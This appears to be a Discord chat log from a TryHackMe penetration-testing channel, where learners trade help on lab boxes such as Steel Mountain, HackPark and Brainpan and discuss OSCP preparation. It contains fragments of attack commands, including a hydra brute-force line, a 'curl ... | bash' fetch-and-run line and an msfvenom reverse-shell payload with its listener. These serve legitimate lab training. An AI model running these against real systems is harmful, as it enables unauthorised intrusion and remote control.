#offensive-pentesting-path
Can someone point me in the right direction on the Steel Mountain powershell command in Task 4? I’ve spent the better part of two hours trying to figure out what the box expects as an answer.
@rancid vine what is the issue?
Honestly? I’m pulling my hair out trying to find the command the question wants.
it's been 3 days I'm stuck on this part, #4
You mean the question about how to find the services manually?
Thought it would be a nice change for people
@final vault I read some article about the unquoted service path because you told me earlier that I didn't understand the exploit. Thank you for that
I now have a better understanding of what is actually going on
😄
sc stop
nothing happens
sc start
yes
You stop the process
yes i did
then restart it with the same name I assume?
yes, I restart the process: sc start AdvancedSystemCareService9
so I pulled my .exe with a powershell -c wget .... command
got my Advanced.exe in the current folder
then I stopped the process and started it again
but I'm still on the same user || Bill ||
what directory are you putting advanced in?
Yea, the powershell -c
I can’t figure out what the correct fill in the blank is to save my life.
I put it in C:\Program Files (x86)\IObit\Advanced System\
I also tried IObit
according to the reading I did
C:\Program Files (x86)\IObit\ "Advanced System"
yeah
So I did some reading and then put it in C:\program files (x86)\IOBIT\
when I put it there and restarted the service, it says that it can't restart the service because the directory or file is corrupted
because advanced system isn't quoted
it will run advanced before it goes into the directory
meaning you can take over
okay because indeed the system is trying c:\ first
and then c:\program files ... and so on
right ?
no
alright, so before going back to reading
last thing
why, when I put my Advanced.exe file in \IObit\ and I restart the service, does it tell me that the file or directory is corrupted or unreadable?
Read up on exploiting unquoted paths and it'll make sense
Anywhere I can read up on finding your naughty powershell command? 😜
Just read up on finding processes using powershell
@rancid vine for that question I just googled "how to see processes running powershell command"
Yea I imagine I’ve just been looking at it from the wrong perspective. Thanks guys.
yes I think so 🙂
I've got nothing. Everything points to get-process which isn't accepted
I think I must have fat fingered once before or forgot a dash on that one because I have it written down as trying it. Thank you.
it happened to me for a room few weeks ago
alright so now you are at the same step as me
I'm struggling quite a lot 🙂 good luck
@hazy ruin Are you stuck at exploiting the unquoted path?
@coral snow can I DM you for a review of my hydra cmd for HackPark please?
@coral snow yeah I'm stuck. I put my advanced.exe file in the \IOBit\ folder but I'm missing something, because when I'm stopping / restarting the service, I get a message saying "file or directory corrupted and unreadable"...
Anyone able to help me with this very annoying flag?
I've terminated and redeployed Alfred 3 times now and got root again 3 times (twice via the intended method and once via just using getsystem on Metasploit) and every time I get to root, there's no root.txt in the expected directory?
Nvm I'm a dickhead.
Can I DM someone who finished Steel Mountain please? 4 days I'm stuck at task 4
Did some reading on unquoted path exploit but I can't make it work still
HackPark, Task 4 question 5. The hint says there is a public writeup on exploit db. I got root without finding any writeup, but the way I identified the service and binary was by entering it into the answer boxes. Could someone tell me (or DM me) the process for finding this write up on exploit db?
@hazy ruin did you get sorted out?
Hi, can anyone PM me on Steel Mountain? (Rooted it, but can't find the correct answer to a question.
and looking for the correct answer on
@fierce kettle it may be happening because the site is under maintenance?
strange (it looks like it's question related, because other questions than these 2 I can submit correctly)
well I can't say for sure because I haven't done anything like those
@fierce kettle wait, you can access the website?
yes i can
look closely at the info on the website to provide the answer and not nmap @fierce kettle
can I PM someone directly, so I can send a screendump of the site directly?
you can pm me yes
I find the answers and questions to be distracting, and sometimes they are misleading. Hints and flags should be enough.
agreed - BUT it has also been pointed out to me that sometimes we enumerate and do not look at all the detail in front of us.
Wondering if anyone can help me with the hydra command for HackPark?
Tried command ||hydra -l admin -P /usr/share/wordlists/rockyou.txt http://10.10.144.170/Account/login.aspx http-post-form|| but it's just erroring with error: ||Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-17 11:35:33 [ERROR] Invalid target definition! [ERROR] Either you use "www.example.com module [optional-module-parameters]" *or* you use the "module://www.example.com/optional-module-parameters" syntax!||
hello
@fleet wedge man hydra or google hydra syntax
oki
You guys simply attack, root and capture the flag, or do you read the task and writeup?
How you study here actually? I just subscribed yesterday!
@ancient locust I usually start the room and see what it is about. Then I read up on whichever area I lack sufficient knowledge on.
Also interesting to read writeups or talk to other members on how they solved afterwards. Often there are small differences in the approach.
@coral snow I see in the task list tryhackme asks for some answers. Sometimes I can't understand the question but I know the answer since I passed the task. Should I really input the answer to track my progress?
And do you only talk here, or can I join a chat somewhere else?
Pretty new myself, started a couple of days ago. So not sure about other channels of communication (except ones listed under social on the site).
I guess you have to answer the questions to get 100% progress.
I can capture the flags but sometimes my answer does not match. And I am trying to avoid msf all the way
@coral snow Is there any guide in tryhackme?
guide? Only the tasks I think. You could check the forums as well. People have probably written writeups as well, but those often don't explain the process very nicely.
The flags should be straightforward to just paste into the answer boxes. But I agree that the other questions and answers can be misleading.
I have got two machines but none of them are 100% completed. Because some questions are misleading
can anyone make a Skynet room video? I'm confused at some step 🙂
Question for tryhackme admins: is it allowed or not allowed to make writeups of tryhackme machines and publish them on my own site? (If yes, do they need to be root.flag restricted or not?)
hide root.flag, it is the best thing 🙂
Perhaps disclosing last few bytes should not harm
"Take a look at the other web server. What file server is running?" A file server could run on same port where the http or https is running?
@ancient locust That one is a pain, and in my opinion misleading. I can DM you the answer
We welcome writeups of rooms @fierce kettle (I'm not an admin) but as long as there are no flags and/or passwords within them, you're more than encouraged to submit a writeup from your site 🙂
You have it correct, but they expect a funky version of it
@coral snow What I know is a server uses its own port. 😦 . I might be wrong! It makes me confused
@coral snow Sure! Check your DM
Thanks, just to be sure, I protect them with the root.txt of the box https://www.puckiestyle.nl/thm-steelmountain-nl/ until I have an admin answer.
@fierce kettle puckie is your real name? I want to start a blog. Thinking about whether "rootpwd" is a good name for my blog or if it looks funky
🙂
What a beautiful language you have in Netherlands xD
puckie is the name of my dog 
🙂
@fleet wedge you turned off DM so I couldn't offer help
But the basic gist is that it is an incomplete command
@obtuse scaffold please don't try to DM people unless they've given express permission 🙂
anyone else having issues getting Alfred to come online?
If you're trying to ping it, chances are that you're running into the windows firewall
Which blocks ICMP by default
nmap pings first unless you use -Pn
I have no idea why Gobuster wouldn't be working
How's your VPN?
Well, that does the trick 🤷♂️ 😁
Hello boys and girls. I just came up with a question. Is blind SQL injection/mapping part of OSCP? And since you don't have access to SQLmap, are you supposed to build the tools to automate extraction yourself? I just spent 2 days scripting the shape of the DB in lordoftheroot.
Anyone of you done HackPark machine?
@ancient locust I did it a couple of weeks ago.
@scenic glen Need a little help. May I PM you please?
Just finished it myself a day or two ago
HackPark I don't get it
punched in everything .exe that seems long enough from ps in metasploit
nothing comes up
Have you already rooted?
no, but I think I have found the admin pw
so bad at windows lol
recon exploit suggester didn't work
Think all i used for this box was winPEAS
you definitely can run as another user in powershell
but i think the intended way that the website tells you to do will be slightly easier than it
I can pm you the runas command for powershell if you like
I don't know what to do after you get a reverse shell as the web user
within metasploit
I waited too long. I don't like HackPark
bash your head at google just to realize your machine shell died even though the machine is still up
AAAAAAHHHHH
my shell only died when I was trying out the kernel exploits ^^
didn't manage to get any of them to work though
hmm I had the same but thought it was because of my own actions (like messing with services etc.)
maybe it's just the box lol
@final vault !!!!!
here is the powershell command for running commands as another user anyway
maybe there is a more elegant way but I don't know it
@obtuse scaffold so you're saying just create another nc listener as the user you find...
really would like to figure out how to priv esc without creds
well you open up a shell as the user you are impersonating
winPEAS has it I believe
lets do it all again...
study anything in red
and google around the stuff in red til it looks like something is there
got winPEAS to work
@obtuse scaffold is there any way to do wget, like in powershell, with cmd?
or run scripts without installing them like with linux
curl http://lhost:lport/file.exe | bash
will check that out
this might be what you mean, not sure though
Just the first result on google
I don't think anything will block you on these boxes though
but you will definitely see it on the harder boxes on htb so good to know about it
why am I being pinged?
there are more things I would learn before HTB @obtuse scaffold
also the lag of HTB free is making me wait longer to resub again
Can I DM someone who escalated the HackPark machine or should I post my questions here?
need some help
hmm, I am being ignored!
ah.... I have shell
I have a shell, making stuff to get the admin shell
will ping you if I solved it
to help
Thank you
I have done it, but better you work together, more fun 🙂
@coral snow thanks for that wink... jk it's all good
hehe.. Just saying in case you get completely stuck
@coral snow some hints might be fine
@coral snow no hints for me I think I know what to do. Well what I want to do
@coral snow would like to get an exploit to work though after this method
someone explain my stupidity here
in HackPark, they ask which RCE CVE is used
the one I used is "wrong"
@maiden vapor which one did you use?
2019-6714
@maiden vapor may I DM you?
yep!
Is anyone else getting constantly timed out trying to connect to smb shares on skynet?
It’s just in general for this room. I already have the creds but the connectivity issues with the room is preventing me from progressing.
@short jacinth Did you complete HackPark?
tryhackme machines suddenly go down, some machines do not come online even after 5 minutes of starting. Time out!
Anyone able to DM me for a bit of help with HackPark, more so getting the Hydra aspect of it working? With video tutorials I'm struggling with understanding it, so a few questions would be majorly appreciated.
@fleet wedge You got hydra working?
that's what I'm trying to figure out @ancient locust, 'cause either I'm doing it wrong or the password lists I've been using are shit.
DM me if you need help with HackPark
just PM me your command and I'll see what's up with it
I need help with Brainpan
@ancient locust stuck on the priv esc part
@short jacinth the machine always goes down suddenly. Does it happen for you too?
@short jacinth Too unstable. I did not try the hydra anymore. Just used Burp. I stopped working on this machine since most of the time it is going down after 20-40 minutes. And I was not able to find the vulnerable service binary. Someone said there is a but I don't see anything interesting
which machine? hackpark?
I can't recall it going down by itself
there was one room though that I had to restart as too much enumeration made it return false values for everything
but after a terminate & redeploy the enumeration worked if I didn't do it as aggressively
@ancient locust trying the brute force part again
@short jacinth Try with all post request
worked with a shorter list trying with rockyou.txt again
try seclist/common-passwords/10k
it worked both times
powershell -c "Get-Service"
@final vault Thanks, was going nuts with this question.
❤️
Game Zone really should have a no-sqlmap task
sqlmap is not allowed in OSCP exam
Kind of defeats the point of the room
The OSCP rooms are all in the process of being updated to include manual sections 🙂
awesome muir 🙂
Thank optional 😄
@short jacinth Probably what you think, but add ".exe"
This is the last box I need to complete for OSCP learning. Can someone help me on which dictionary to use for “jack”
The pre-eminent expert on Jack is away just now I'm afraid
?
@fleet wedge The word list you need is installed by default on Kali
@short jacinth any progress on finding the abnormal service? I've rooted the box but the service name I'm putting in there keeps saying wrong answer
@fleet wedge check out isroot.nl the article there makes the learning process relatable. Thank me later
@violet shore I have everything, I am just stuck at the msfvenom payload
I have read some articles
Looks like in vulnhub it's running on Windows
Whereas tryhackme runs linux
I tried both payloads nothing seems to work
not sure why it's down right now http://shell-storm.org/shellcode/
but this just has a bunch of shellcode for your bof exploit
ino i got it
thanx anyways coaran 🙂
privesc was quite easy
initial shell took me a while, never actually generated one for Linux machines, most of the time nc, python, php etc. did the trick
has anyone completed the manual exploitation of "Steel Mountain"?
@fleet wedge were you able to get shell without meterpreter, couldn't get normal reverse_shell payload to stick
only worked through meterpreter payload for me
@obtuse scaffold I am on the OSCP path, I don't use meterpreter or metasploit
also yes i did it without it
@violet shore HackPark I have thrown winPEAS, JAWS, tasklist, schtask, get-process, and Get-ScheduledTask not sure what .exe string I'm looking for
feel like for windows manual process enum would be useful
@neat socket I have done 3 machines. There is a bit much focus on automated tools like metasploit and sqlmap. OSCP is more manual, modification of exploits etc.
That said it certainly gives a taste of the PWK labs, and I am having fun.
No one is forcing you to use metasploit and sqlmap
Nope, but one would like to follow the room tasks, isn't that part of it? Not saying you can't just ignore the tasks and root it, but it would be nice if the tasks focused more on manually exploiting.
If you have to follow the room task to root the box, then you should not be taking the OSCP exam
The PWK is also way easier than those boxes (or some of them)
Then whats the point of the tasks?
I didn't make the task so don't ask me
I'm just being 100% real about the OSCP exam, and those tasks should be avoided if you're practicing for the exam
I'm just weighing in on @Syscoin_long's question. And I agree, I don't like the tasks either. The machines are ok though
Certain machines may or may not be based on the very thing you expect from the path
@alpine peak May I DM you?
sure
@alpine peak is it Ok to DM you questions about hackpark?
Sure
Did anyone manage to get the chatserver.exe running locally? been trying to get it to run on a Windows VM with no luck, not sure what I'm missing
@obtuse scaffold did you include the dll?
Not sure how to, I just have both the files and was trying to run the exe ^_^
@fleet wedge The word-list you need is installed by default on Kali.
Can't tell you which one as that will be a spoiler.
@noble glacier I tried rockyou but it’s going to take 10 hours
That, I'm afraid, doesn't hold much incentive for spoiling it 🙂
Everyone has the same challenges -- it's part of the box. We can't just give out spoilers to everyone who asks, now, can we?
The help channels are for helping people to understand things that they haven't quite got yet. Telling you which wordlist to use doesn't really fall into that.
can someone check what I am doing wrong with Steel Mountain?
can I discuss the question in public or should I try to find someone who can reply directly?
@night spade what's the issue you are facing?
it was pretty hard to submit a webserver name, the same for CVE number
but end of the day it seems like it matches with metasploit module description
Not sure what you mean honestly.
I'm going to livestream the box in a couple hours for anyone who wants to see.
so question was:
Take a look at the other web server. What file server is running?
first i was trying name from the footer at that index page, then name without version number, name from official web page of that webserver, name from CVE list
but at the end it was a name without spaces
no, actually it was with spaces
but with that vendor or whatever in front
I mean, this one is fairly straight forward. You can search the name of the web server and it tells you exactly what it is. Typing it in exactly as it is in Google shows the specific exploit you'll use.
of course, i had to use title from exploit-db
am I blind? Take a look at the CanRestart option... I don't see anything related to that
fixed it. had to redownload the script and reupload
is there a reason why the root shell dies instantly for steelmountain using metasploit?
Never had that issue.
for some reason even after i extend the machine by an hour, as soon as it hits 58 mins, it dies
it was at 1.5 hours, just hit 58 mins and connection died
can someone give me a tip on winpeas? it just hangs in the terminal and doesn't do anything
Hangs how? Like you run it and it doesn't fire off?
yea
I'll have to go back to it at some point and check it again. I tried the obfuscated and reg ones
ended up having to back out of the shell and try again
hey
hey
I have a problem getting the exploit to work on Steel Mountain: it says complete but no session was made. Has anyone experienced this?
You have to cuss at it
Don't let it smell fear or it will fail
It senses it
@plucky jewel
Hey! Sparkle are you having the same problem with Steel Mountain [task 2] using Metasploit to access the Machine???
I've been trying all day to gain access
z
only issue i had with steelmountain was winpeas
How could I find out how the meterpreter upload function works?
Like the actual code behind it.
Is there a trick to saving burpsuite results to a text file to use with sqlmap? It keeps telling me its an invalid format of a request file
This is for the gamezone room
I find just copying and pasting the text manually into a file.req works best, and then removing all the empty lines except one separating params
works best for me
Removing the spaces seemed to do the trick thanks a ton
https://tryhackme.com/room/hackpark task#2, when you get 1 of 1 target successfully completed, 16 valid passwords found from Hydra, that means there is a mistake in my command, right?
Whatever the wordlist I'm using, I'm getting this 16 valid password found
hello, has anybody done the exploit with Metasploit on GameZone?
It is Task 6, I failed to create a session in Metasploit.
Or you know
Answer them yourself. If you’ve rooted stop being lazy, run the script and find the answers...
I'm having the same issue bbakbbak2, I can't seem to find any manual exploit examples on the internet
The issue seems to be with the authentication, it's a little fucky because of needing to use an ssh tunnel to reach the webmin panel in the first place I'm sure
Okay slight progress, if you set the ssl option to false it tells me it authenticates successfully and creates a meterpreter session but it instantly backgrounds it and if I try to go to the session it dies
Guess its time to do the metasploit room :b
see if that helps
anyone know how I can change the administrator password for the admin account, where its current password is expired, from a lower priv account? Where I have the current password
(for the expired admin)
commandline ideally
done it 🙂
Hello people, I have a problem with Brainstorm.
I have created the exploit in my Windows XP VM and it worked perfectly. When I launched it into the Brainstorm machine it was not working.
After doing some research, I checked the writeup and realized that the user of the writeup was sending 1002 letters A to get to EIP, in my case, I was sending 6102 A
Do you know why the offset is different?
With 1002 it worked perfectly
Thanks in advance, I await your response
Do I have to use a Microsoft Windows 7 Ultimate VM?
Would anyone be interested in a live stream of something like Steel Mountain? I know I see folks having trouble with it.
is there a better wordlist for use with gobuster on the first task? gobuster seems to be taking forever
@twilit valve I usually start with this list and use 100 threads: gobuster dir -u (target)/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
@timid crow you're right. but I want to know what the problem is... it will make me crazy if I come across the same situation.😫
I wish the man who solved the room would appear
Question on hackpark What is the name of the abnormal service running? can't figure out the correct question ( i know it's C:\Program Files (x86)\SystemScheduler> and M***.exe is the next question)
@fierce kettle if you have a shell couldn’t you just go to that directory and look?
I have now, thanks. It was W**********.exe (the answer was case sensitive)
@simple loom may I PM you for a question? Using winPeas, what was the Original Install time? (is this for the dir or the W.exe file, and is the "," needed in the accepted answer?)
I had issue with that Q, try 'systeminfo' in a standard cmd shell
@cosminthrill amazing, thanks. If you need info on any HTB machine, you may PM me, I can help you 👍
@fierce kettle you're most welcome. An extra challenge in some rooms is trying to find the exact answer format! 😉
Does anyone have any recommended resources that might explain how to exploit SQL injection manually? I am working through Game Zone and can use SQLMap tool easily but I don't understand how it is working
@cloud flicker Try using sqlmap with burp suite.
you can intercept sqlmap with burp?
sqlmap <whatever> --proxy=http://127.0.0.1:8080
(it looks like there's some add-on but I just wanted to look fast, hahah)
oh that makes sense, nice!
tackling it now rootpwd, I'll let you know how it goes
@timid crow I got the root
But I can't answer a question
how many ports are open
@ancient locust scan the machine with nmap to see that
@bronze zenith Yep.... Did it, and it always says wrong
did you scan all of them
I counted how many ports are open.... if 3 ports are open I answered 3
yes
and it always says 'wrong'
@bronze zenith Can you please check it?
@ancient locust what room is that
Brainstorm
okay I'll check it
nmap command: nmap -v -p- -T4 -Pn ip
Daily Bugle.. I am getting rev shell as apache. Any vague hints on pivoting?
@ancient locust but that's not all the ports
i am checking wait a bit
I am scanning again... But this time, it is too slow
@bronze zenith So there is something wrong with the test of the answer
but it's a medium level room
I got root flag
maybe there's another way
this box supposed to be realistic since it is listed in oscp learning path. I don't think the port is hidden.
@bronze zenith Guessing worked! And the answer is practically totally wrong
yeah i guess
@ancient locust That did it, thanks. Was not aware of linpeas
@coral snow 🙂 . Got the root too?
||is it intended to use migrate to privesc in Jenkins?||
@ancient locust More or less, know the route 🙂
@coral snow these machines are easier than HackPark, Vulnversity
@ancient locust Vulnversity is part of the OSCP path?
but Daily Bugle is easier than Vulnversity?
and Vulnversity is easy, so Daily Bugle is... super easy?
@ancient locust It is rated hard, though
Buffer overflow machine is easier
I am still struggling with hackpark
These questions and answers are killing me lol. I was able to exploit with a CVE-listed vulnerability and here it says my answer is wrong
apt-get install python-pip
No package in Kali?
On the GameZone machine Task 5 says it is possible to confirm that a service is blocked by the machine's firewall using iptables, but when running iptables -L I get a permission denied error.
@ancient locust Aaaaand rooted, thanks! 🙂
congrats
@rancid vine yes
giving up working with hackpark. Very unstable machine
😦
This machine doesn't like me at all
@ancient locust I'm unable to complete it too, I think it is bugged to where it dies after an hour even if you extend the time. Just becomes totally unresponsive. I think admins are looking into it
@cloud flicker I tried with Vulnversity, when I fuzzed the file it became unresponsive
I've tried multiple times at different speeds and it seems to just die after a certain amount of time as opposed to any specific activity
So it's not just me then. That's good.
Yeah I’m having trouble completing HackPark due to the instability
what's up with HackPark? I'm on the priv esc part atm
oh the time extension.. yea it's extremely annoying lol
anyone having issues with Windows Exploit Suggester? I updated the database, updated xlrd and both show they've been updated. Then the script says please update lol
oh man i feel so stupid haha.. just spent like 45 minutes on DailyBugle ||as the wrong user for priv esc||
@undone jacinth May I DM you?
maybe someone can give me a hint for task 4, second question, in the "Steel Mountain" room? There is a question about a powershell command.
I had some issue with that myself @night spade try googling "powershell commands to show running services" and doing a little reading. The first part of the answer is already there for you in the question 🙂
Feel free to pm me if you are still lost
ooh, got it, thanks
hello
Having trouble getting started on Brainstorm, can't seem to get ftp to play nice for some reason
Been bashing my head against the wall on this one and I'm sure it's super simple, any help is appreciated
I'm pretty sure you should just be able to search the filesystem on ftp
maybe try reset
I'm stuck trying to transfer the reverse shell into hackpark. I've tried three different ways of doing it.
@brittle needle I'm at the same step. did you try uploading the exploit through the same process as the first one?
@brittle needle @hazy ruin ||think about how an authenticated user could upload things onto a blog page, like updating an image on an existing post or on a new post||
I did it, it worked yay 🙂
MSF is quite clunky tho, I was doing the same yesterday night, and I was struggling to get my listener from MSF
Yeah msf is a bit iffy on this box, I actually did manual only on this box. Better for oscp prep that way anyways :b
yeah I should do that next time
I take my test Tuesday, probs won't pass the first try but I'm looking forward to seeing what the exam is like and getting a shell or two 🙂
btw I'm currently trying to privesc on the machine (HackPark)
Can I use the command wmic ................... . . . .
or is it only for unquoted path purposes ?
okay
Hi, I need help with authenticating to BlogEngine
Same like HackPark
Password is cracked, but when entering it, it is showing something like ‘oops, developer caused this issue, apologies, 20 lashes to him blah blah’
Can anyone help me regarding this?
which room @crude shale ?
I'm still stuck at HackPark question task#4. I found the abnormal service || WindowsScheduler ||, however I was pretty sure that I need to exploit something with || WSservice.exe ||, however it is not the right answer. I launched some other scripts I have and all are pointing to the same .exe. Where should I look?
I mean, the hint is talking about || log files ||, I checked them from || c:\program files (x86)\SystemScheduler\logfile.txt and logfileadvanced.txt || but didn't find anything special
@hazy ruin you're on the right path with the idea of scheduling. Take a look at running processes using "tasklist" several times. do you notice any programs that run every minute or so?
Thanks, just did tasklist, how do I know how often a task is running ?
You said " to run it several times" okay got it
thank you,
Got it right now
yay 🙂
just look at time logs @hazy ruin
Found it I'm good now 👍
Why do I get an authentication error when doing ||smb||map in Skynet?
but there is no way to get abnormal service name for third question in process list, right?
for HackPark? @night spade
yes
because I was not able to get the exe from the process list and I just listed services
I mean.. it's intended to use WinPeas
and then just added .exe to the name running
yeah you are supposed to add exe
processes are usually displayed without an extension
just a name
but as I understand that is just a service name, process have a different name which can be seen in process list
am I wrong and there actually is that {servicename}.exe somewhere?
you need a service yes
you can either list processes or run WinPeas (which is better)
Yes, you should use winpeas
also the next task asks you to use it
@timid crow how'd you fix it?
May someone help me in Skynet, I actually don't know how to upload the shell :/, kinda don't understand what the exploit description says, went through passwd and configuration.php but, what else?
are there any video demonstrating buffer overflows room?
I'm a bit of a n00b with this...
I'm going through a bufferoverflow right now in cod caper
it's very descriptive and helpful, this is my first time trying a bof
Trying to do buffer overflow room
Cod caper has buffer overflow?
I'm gonna do it today, woot!
I can comfortably say it does
You should've told me that before :(
I told you I'm the creator of like half this site's RE content
Which is pretty sad tbh
Why?
Because there's not enough re content
True that.
Robin this is your area
My room is 90% complete though.
Make some rooms!
Yeah, surely will.
hey guys, sat the OSCP yesterday. anyone sat it recently? what are the turnaround times on exam results with 'rona?
no idea on results but one of our members is doing an exam right now
@final vault :s
oooo, good luck!
Okay Im losing my mind here. Brainstorm room ftp is just not letting me pass any arguments, consistently getting "501 Server cannot accept argument" error
Any help at all is much appreciated
I'm gonna start it later
let me know if you have similar issues
Sure :)
Anyone have an issue running the Invoke-Kerberoast.ps1 on corp?
Nvm, forgot to import it
@timid crow hey I'm in Brainstorm now, what was your problem about?
I couldn't get ftp to cooperate
did anon login and that would be fine but wouldn't let me list contents or do anything other than change binary mode or go to passive
Just did brainpan though so I still got some BOF practice 🙂
well it works for me actually
well that's good! I'll give it another try later, need a break after brainpan
like I said before I'm sure it's something super simple I'm missing but it's frustrating when it's the super simple aspect that's tripping me up and not the actual buffer overflow lol
Does it say the system cannot find the file specified? @timid crow
yes that was one of the errors
i managed to solve it, just cd into the directory it says and you'll find both @timid crow
Has OSCP always allowed msfvenom and exploit/multi/handler on the exam
Thought they were included in the "once per exam" restriction
@undone jacinth You're allowed to use msfvenom and multi/handler as many times as you like in the OSCP exam.
nice
just started lab access for the second time. already rooted more boxes than my entire lab time previously 🙂
for windows it's a good idea to use windows/shell_reverse_tcp
you can tell whether a payload is staged by running msfvenom --list payloads | grep windows/linux
do you even need multi/handler for stageless though
Nope
It can be used if you like the feel
it's just inefficient compared to catching it on nc
anyone done lord of root without sqlmap
@fleet wedge what rooms should I do to prepare for Brain Storm oscp room.
I can't find any write ups for brain storm or buffer overflow room so struggling quite a bit with radare2
What's the remote IP (RHOST) for the OSCP path
@stray lynx There's a Brainstorm writeup published on the room page
Thanks @cloud flicker I swear that wasn't there the other day 👍
You're welcome! I'm learning about BOF right now using this https://github.com/justinsteven/dostackbufferoverflowgood and it's very good at explaining it all!
Means I can save the two BOF rooms as an actual challenge, too
Thank you 😊
@hollow wraith what do you mean? Each room has its own IP after you deploy the machine
I'm using my machine IP and Eternal Blue on metasploit is not working
Go to the page of the room you are working on, and make sure the machine is deployed (in Task 1). It should show you the IP address and how long you have left
The exploit was sent, the log is saying that your target is not vulnerable.
then what's the purpose of the lab
Try using forceexploit true as it suggests
I figured it out each room has a new VM deployment
What does OSCP path contain?
Do the machines have hints in the Oscp path?
OSCP path contains OSCP alike boxes.
some of them contain hints yes, but some not
Can confirm the oscp path contains pretty decent boxes tbh
@final vault Exam over?
yes
cool!
everyone saying results will be in 5 days.. hopefully he will clap it
it may be delayed up to two weeks (as I heard) due to the current situation going on
may be not sure
ohk
Is it harder than tryhackme oscp path
Honestly yes and no, the exam isn't as bad as it's made out to be. PWK is harder I'd argue due to the large number of active directory on there
Hello my fellow hackers, I rooted SteelMountain already, but I just couldn't figure out the question under Task 4. Can anyone enlighten me a bit?
thank you sir, I'm new here, so apologies for posting that..
np
Anyone prepping for eCPPT here? What path are you doing from tryhackme as prep?
I would look at Kenobi, the XSS room, Blue, and maybe Linux privesc. Being as eCPPT actually requires pivoting you’ll want to go through the lab in PTP that covers proxychains a few times.
Also the BOF rooms wouldn’t hurt.
PTP has a price issue for me
So does the unequally expensive OSCP. I paid less for eCPPT than I did OSCP.
¯\_(ツ)_/¯
And I learned a boatload more.
I paid a grand for PTP. I paid $1349 for PWK/OSCP.
how @rancid vine even with the discount code from TCM still costs me $1.4k
ELS regularly gives discounts that make their content pretty affordable. In this case I bought it on Black Friday, which gave me 25% off and a free upgrade from full to elite.
Think I paid $1,099 in total for it. I actually paid less for PTP and PTS than I did for PWK/OSCP.
Can I DM a mod really quick?
@rancid vine sure
I'm in the US, so I didn't have to pay VAT fortunately.
damn it
Hey everyone! At 1pm EST I'll be livestreaming Steel Mountain and covering both the Metasploit exploitation as well as the manual exploitation. You can check it out here. https://www.twitch.tv/themayor11
oh, alright, sorry for that then
No worries.
just enforcing the rules, don't mind me 😦
I know. No hard feelings.
thanks for the understanding
As a reminder I'll be streaming Steel Mountain in 10 minutes at the link above. Hope to see everyone there.
Thanks everyone who stopped by. Hopefully the stream helped!
Starting my oscp class on june 21st!
So I managed to break boilerctf by sshing to some machine under the machine and now the page I needed doesn't work any more 😄 Now this is an easy fix. Just start another machine. But what if I do this in the exam?
Congrats man !! 🥳🥳 @lusty epoch
congrats
thank you ❤️
Congracheulashions ❤️
It happened to me 2 days ago when I broke a certain file I was supposed to read from in catdog. Luckily the service uses 2 files and I had a backup. Here there isn't
i think you have the possibility of resetting the boxes
thank you all
no worries
Trying to do the steel mountain on oscp path
Can't figure out the powershell -c question
Can anyone help me?
google is your best bet.
^^
Just got the email through
@lusty epoch do u have ceh?
Not yet, thats next on the list though 🙂
is there a reason for getting ceh at all?
@arctic wyvern Some employers look for it as part of their automated or manual application processes as it's still recognised as an 'essential' skillset in a lot of places. It's a requirement for recruitment and/or promotion at some levels in the DoD in the US. Most worthwhile cybersec recruiters will know the value of other certs and experience.
fair enough, doesn't seem worthwhile otherwise. I know my employer thinks it's a joke and would prefer oscp, gpen, gwapt, cissp etc. might still help as an HR filter thing but yea, general consensus seems to be it's not worth the $ or time
Considering the reputation of oscp/gpen and even the eLearnSecurity crowd has been getting some recognition for their training/certs. Going on what I've heard I would put OSCP/GPEN higher
how good is this path?
it's good
Wondering if anyone can help me with Skynet? DM Me please 🙂
What's the problem you're having?
hey guys, I have a question more than help for room https://tryhackme.com/room/skynet , task#1 . I managed to get the answer pretty quickly with || burp || however, my first attempt was to do so through || hydra || instead with a || http-post-form || I couldn't get the answer as || hydra was telling me that every password was good || is there any of you that did it with || hydra || rather than || burp || ?
if hydra says its all good
then you haven't specified what a wrong request looks like
yeah that's what I was thinking.
on the http-post-form i think it looks like page.php:USER-PASSWORD:incorrect value
so if it says "invalid password" in the response
however the wrong request was giving me " unknown user or password incorrect"
you would do page.php:USER-PASSWORD:invalid password
so I put at the end ":unknown user or password incorrect"
but was getting the same issue
but i must do something wrong
you can just put password incorrect
you could also use wfuzz or ffuf to do the same thing
okay
I had the same issue, I'm not sure what was up, ended up doing it on burp. I specified Login=Login:Incorrect and it just said everything was valid on hydra 🤷
Yes I tried different error msg at the end of my cmd but wasn't working
I prefer to use cmd line than gui
so I'm not so burp
For those having difficulty with buffer overflows, would a live stream covering Brainpan be of use to everyone?
probably too advanced for me at the moment but would certainly love to drop in and watch or catch that vod!
Have you ever done any BoF's before?
not really, I did the bof1 room and the one on codcaper if that one counts but am interested and will spend the time to learn it especially for the oscp but that is still 6+ months out for me
So I try to use Ruby when I can, which makes it a whole ton easier.
I went over brainpan about a week ago
might be good to see it from someone elses point of view tho
working on privesc, not sure why it's not working like in the walkthrough
can I ask someone for clue?
@glass sparrow which room is that?
@bronze zenith brainpan
@glass sparrow have you found a file which you can sudo without a password?
@bronze zenith yes I have
so now just use it to read a manual page for a command
and use Vim command inside of it to spawn a shell
just like the walkthrough on the internet right?
I got reverse shell, but when I type id my reverse shell is closed
listening on [any] 9002 ...
10.10.114.192: inverse host lookup failed: Unknown host
connect to [10.11.5.213] from (UNKNOWN) [10.10.114.192] 42298
id
root@kali:~#
ah
What kind of reverse shell are you trying?
I'm gonna do a live stream of this later I think.
@rancid vine linux
for windows I get cmd, but unable to have proper shell
Which one?
So the Windows shell naturally doesn't work because it's running Wine on the Linux machine, and you need a proper linux shell.
@rancid vine can I dm you?
I don't think we are necessarily going to spoil anything here if you want to ask here.
let me try again
I've rooted hackpark but the last question asks about the original install time, I can't find this, can someone let me know what/where it is?
finally rooted brainpan
msfvenom -p linux/x86/shell/reverse_tcp
and listen with
use exploit/multi/handler
set payload linux/x86/shell/reverse_tcp
Thanks for the spoiler @rocky narwhal
I used a regex to search the winpeas output for the time/date format specified in the answer but none of them work 🤔
@glass sparrow write with | Spoiler Tag |
@frigid star Have a look at systeminfo command in a standard command prompt.
I'll be live in 45 minutes at https://www.twitch.tv/themayor11 to cover Brainpan and how you can use Ruby to exploit buffer overflow vulnerabilities. The associated guide is here for you to follow along. Hope to see everyone soon! https://www.cybersecpadawan.com/2020/05/tryhackme-brainpan-ruby-exploitation-no.html
If you’re going to follow along you’ll need to have “Pry”, which should be available in the apt repository.
See you in a few. Starting up now.
Thanks to everyone who hung out today! Hopefully you were able to learn something. 🙂
it was great, thanks @rancid vine
You're very welcome.
